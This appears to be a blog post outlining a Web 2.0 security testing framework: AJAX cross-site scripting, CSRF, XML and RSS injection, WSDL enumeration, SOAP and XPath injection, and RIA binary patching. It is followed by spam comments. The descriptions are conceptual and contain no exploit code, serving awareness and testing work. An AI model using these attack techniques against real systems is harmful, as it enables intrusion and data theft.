Web 2.0 Security Testing Approach - Make Money without a job


Introduction:

Web 2.0 can be defined as the evolving trend of www technologies and web design that aim to enhance creativity, communications, secure information sharing, collaboration and functionality of the web1. 0. In contrast to the static nature of Web 1.0, Web 2.0 systems rely heavily upon user generated content. In fact, Web 2.0 has been described as the “participatory Web.” For example blogs and photo sharing services enable consumers to add and update their own content. While the focus of Web 2.0 threats emanate primarily from new usage patterns, several technologies are so widespread in Web 2.0 applications, that security threats associated with them are characteristically considered Web 2.0 security threats. Examples of such technologies include AJAX, widgets, and application platforms such as blogs, wikis and social networks.

Web 2.0 Threats:

Web 2.0 is both a set of technologies as well as a new set of consumer behaviors. The combination of these two elements has created an enormous opportunity for attackers to exploit online resources for “fun and profit.” It is important t o understand the implications of these new risks, particularly when considering employing Web 2.0 technologies for professional and commercial use. Yamanner, Samy and Spaceflash type worms are exploiting “client-side” AJAX frameworks, creating new avenues of attack and compromising some of the confidential information. On the “server-side”, XML based Web services are replacing some of the key functionalities and providing distributed application access through Web services interfaces. These remote capabilities to invoke methods over GET, POST or SOAP from the Web browser itself provide new openings to applications. On other side, RIA frameworks running on XML, XUL, Flash, Applets and JavaScripts are adding new possible sets of vectors. RIA, AJAX and Web services are adding new dimensions to Web application security.

Top Web 2.0 Security Threats

Test Approach:

It is the goal of the our Security research team to further expose these threats as well as to promote the secure use of Web 2.0 technologies for business so that organizations can take advantage of the huge opportunities afforded by this next generation of the Web in order to do more business.

Our Web 2.0 Security Testing Framework comprises of some common web vulnerabilities such as XSS, Injections and CSRF as well as some new threats that are harder to mitigate and may fall into the realm of logic issues such as insufficient authentication and anti-automation. To top that, the abstract nature of Web 2.0 makes something like phishing, not usually associated with web applications into a Web 2.0 problem.

Highlights:

Automated exploitation and accurate vulnerability validation

Comprehensive coverage of all OWASP application vulnerabilities such as Cross-side scripting, SQL injections, HTTP response splitting, Parameter tampering, Hidden field manipulation, Backdoors/debug options, Stealth commanding, Session fixation, Automatic intelligent form filling, Forceful browsing, Application buffer overflow, Cookie poisoning, Third-party mis-configuration, HTTP attacks, XML/SOAP tests, Content spoofing, LDAP injection, XPath injection.

Support for modern websites using JavaScript, Macromedia Flash, AJAX, Java Applets, ActiveX.

Business logic verification and testing.

Combination of automated testing with expert validation & custom exploitation.

Prioritized threat profiling with effective remediation.

The following are the type of tests covered as per our guidelines…

1. AJAX Testing:
Ajax is one of the latest web development techniques to create more advanced and better responsive web application. Though the usability of AJAX provides lots of fruitful features but it also wide opens the possibility of vulnerability to be incorporated, if not designed/developed properly. The conventional web application vulnerabilities are applicable to AJAX based development along with several specific vulnerabilities like Cross Site request forgery (CSRF/XSRF).

1.1 Testing for Cross-site scripting vulnerabilities in AJAX
In the past few months several organizations including Yahoo mail and Myspace.com reported about the cross-site scripting attacks where malicious JavaScript code from a particular Web site gets executed on the victim’s browser thereby compromising information. AJAX gets executed on the client-side by allowing a malicious script to be exploited by an attacker. The attacker is only required to craft a malicious link to coax unsuspecting users to visit a certain page from their Web browsers. This vulnerability existed in traditional applications as well but AJAX has added a new dimension to it.

1.2 Testing for Malicious AJAX code execution
AJAX calls are very silent and end-users would not be able to determine whether or not the browser is making silent calls using the XMLHTTPRequest object. When the browser makes an AJAX call to any Web site it replays cookies for each request. This can lead to potential opportunities for compromise.

1.3 Testing for Client side validation in AJAX routines
Today in the era of Web 2.0, most applications use AJAX routines to perform a lot of activities on the client-side such as client-side validations for data type, content-checking, date fields, etc .Now developers often commit mistakes assuming that the validation is taken care of in AJAX routines. These client-side checks must be backed up by server-side checks as well. It is possible to bypass AJAX-based validations and to make POST or GET requests directly to the application – a major source for input validation based attacks such as SQL injection, LDAP injection, etc. that can compromise a Web application’s key resources.

2. Testing for Insufficient Authentication Control
In many Web 2.0 applications, content is trusted in the hands of many users, not just a select number of authorized personnel. That means there’s a greater chance that a less-experienced user will make a change that will negatively affect the overall system. This change in a system’s design can also be exploited by hackers who now have access to a greater number of “administrative” accounts whose passwords can often be easily cracked if the correct security controls are not in place. The systems also may have insufficient brute-force controls, permit clear text passwords, or have been tied together in a single-sign-on environment, making an attack that much riskier.

3. Testing for XML Poisioning
XML traffic goes back and forth between server and browser in many of the WEB 2.0 applications. Web applications consume XML blocks coming from AJAX clients. It is possible to poison this XML block. Not uncommon is the technique to apply recursive payloads to similar-producing XML nodes multiple times. If the engine’s handling is poor this may result in a denial of services on the server. Many attackers also produce malformed XML documents that can disrupt logic depending on parsing mechanisms in use on the server. There are two types of parsing mechanisms available on the server side – SAX and DOM. This same attack vector is also used with Web services since they consume SOAP messages and SOAP messages are nothing but XML messages. Large-scale adaptation of XMLs at the application layer opens up new opportunities to use this new attack vector.

XML external entity reference is an XML property which can be manipulated by an attacker. This can lead to arbitrary file or TCP connection openings that can be leveraged by an attacker. XML schema poisoning is another XML poisoning attack vector which can change execution flow. This vulnerability can help an attacker to compromise confidential information.

4. Testing for RSS/Atom Injection
This is a new WEB 2.0 attack. RSS feeds are common means of sharing information on portals and Web applications. These feeds are consumed by Web applications and sent to the browser on the client-side. One can inject literal JavaScripts into the RSS feeds to generate attacks on the client browser. An end user visits this particular Web site loads the page with the RSS feed and the malicious script – a script that can install software or steal cookies – gets executed. This is a lethal client-side attack. Worse, it can be mutated. With RSS and ATOM feeds becoming integral part of Web applications, it is important to filter out certain characters on the server-side before pushing the data out to the end user.

5. Testing for Information Integrity
Data integrity is one of the key elements of data security. Although a hack could lead to loss of integrity, so can unintentional misinformation. A great example of this in the public arena is a mistaken edit on Wikipedia which is then accepted as fact by many of the site’s visitors. In a business environment, having systems open to many users allows a malicious or mistaken user or users to post and publish inaccurate information which destroys the integrity of the data.

6. Testing for WSDL Scanning and Enumeration
WSDL (Web Services Definition Language) is an interface to Web services. This file provides key information about technologies, exposed methods, invocation patterns, etc. This is very sensitive information and can help in defining exploitation methods. Unnecessary functions or methods kept open can cause potential disaster for Web services. It is important to protect WSDL file or provide limited access to it. In real case scenarios, it is possible to discover several vulnerabilities using WSDL scanning.

7. Testing for CSRF
In CSRFs, victim visit what appear to be innocent-looking web sites, but which contain malicious code which generates requests to a different site instead. Due to heavy use of AJAX, Web 2.0 applications are potentially more vulnerable to this type of attack. In legacy apps, most user-generated requests produced a visual effect on the screen, making CSRF easier to spot. Web 2.0 systems’ lack of visual feedback make this attack less apparent. A recent example of a CSRF involved vulnerability in Twitter in which site owners could get the Twitter profiles of their visitors.

8. Testing for web services routing issues
Web services security protocols have WS-Routing services. WS-Routing allows SOAP messages to travel in specific sequence from various different nodes on the Internet. Often encrypted messages traverse these nodes. A compromise of any of the intermediate nodes results in possible access to the SOAP messages traveling between two end points. This can be a serious security breach for SOAP messages. As Web applications move to adopt the Web services framework, focus shifts to these new protocols and new attack vectors are generated.

9. Testing for Insufficient Anti Automation
Programmatic interfaces of Web 2.0 applications let hackers automate attacks easier. In addition to brute force and CSRF attacks, other examples include the automated retrieval of a large amount of information and the automated opening of accounts. Anti-automation mechanisms like Captchas can help slow down or thwart these types of attacks.

When introducing Web 2.0 into the workplace, it’s important to have a good understanding of the types of risks involved. However, that said, while Web 2.0 may present different types of challenges, those are not necessarily any worse than the risks involved with legacy applications – they’re just different. And the opportunities that Web 2.0 technology can provide a business make overcoming these potential threats worth the effort.

10. Testing for Parameter manipulation with SOAP
Web services consume information and variables from SOAP messages. It is possible to manipulate these variables. For example, “10” is one of the nodes in SOAP messages. An attacker can start manipulating this node and try different injections – SQL, LDAP, XPATH, command shell – and explore possible attack vectors to get a hold of internal machines. Incorrect or insufficient input validation in Web services code leaves the Web services application open to compromise. This is a new available attack vector to target Web applications running with Web services.

11. Testing for XPATH Injection in SOAP Messages
XPATH is a language for querying XML documents and is similar to SQL statements where we can supply certain information (parameters) and fetch rows from the database. XPATH parsing capabilities are supported by many languages. Web applications consume large XML documents and many times these applications take inputs from the end user and form XPATH statements. These sections of code are vulnerable to XPATH injection. If XPATH injection gets executed successfully, an attacker can bypass authentication mechanisms or cause the loss of confidential information. There are few known flaws in XPATH that can be leverage by an attacker. The only way to block this attack vector is by providing proper input validation before passing values to an XPATH statement.

12. Testing for RIA Thick Client Binary Manipulation
Rich Internet Applications (RIA) use very rich UI features such as Flash, ActiveX Controls or Applets as their primary interfaces to Web applications. There are a few security issues with this framework. One of the major issues is with session management since it is running in browser and sharing same session. At the same time since the entire binary component is downloaded to the client location, an attacker can reverse engineer the binary file and decompile the code. It is possible to patch these binaries and bypass some of the authentication logic contained in the code. This is another interesting attack vector for WEB 2.0 frameworks.

Tools Used:
Appscan
Acunetix
iViZ APT
OWASP Sprajx Tool
ScanAjax

Conclusion:
The most three important technological vectors for the WEB 2.0 application are AJAX, RIA and Web services. Despite the huge benefits afforded by Web 2.0; they do not come without a cost. To enable increased user interaction, integration APIs and web applications need to be more complex and they need to support an ever-increasing set of clients. With these new technologies come new security issues, and ignoring them can lead to big disasters for the corporate world. In this document, the discussion was restricted to only some common attacks but there are several other attack vectors as well. With the invent of Web 2.0 we also focuses on the security aspects associated with different components of Web 2.0. to grow security awareness, secure coding practices and secure deployments which offer the best defense against these new attack vectors.

Source:Make Money without a job - Tony James

Comments

  1. Anonymous23/8/12

    Hello, Neat post. There is an issue along with your web site in web explorer, might check this?
    IE nonetheless is the marketplace leader and a big part
    of other people will miss your wonderful writing due to this
    problem.
    Also visit my web-site how to delete cookies from computer

    ReplyDelete
  2. Anonymous17/10/12

    Hmm it sееms like your blog atе
    my firѕt сomment (іt was suρer long) so І guess I'll just sum it up what I had written and say, I'm thoгoughly enjoуing уοuг blοg.
    I aѕ well am аn asрiгіng blog blоggeг but I'm still new to everything. Do you have any helpful hints for beginner blog writers? I'd
    геаlly аppreсiate it.
    My web page: captcha breaker

    ReplyDelete
  3. Thanks for the kind words, your website is good as well. My style of writing is nothing fascinating its just what I read explore and write. The more I work, the more I have stuff to put on the blog. Creativity and patience is the key to getting people read what you write.

    ReplyDelete

Post a Comment

Popular posts from this blog

Software Testing @ Microsoft

Trim / Remove spaces in Xpath?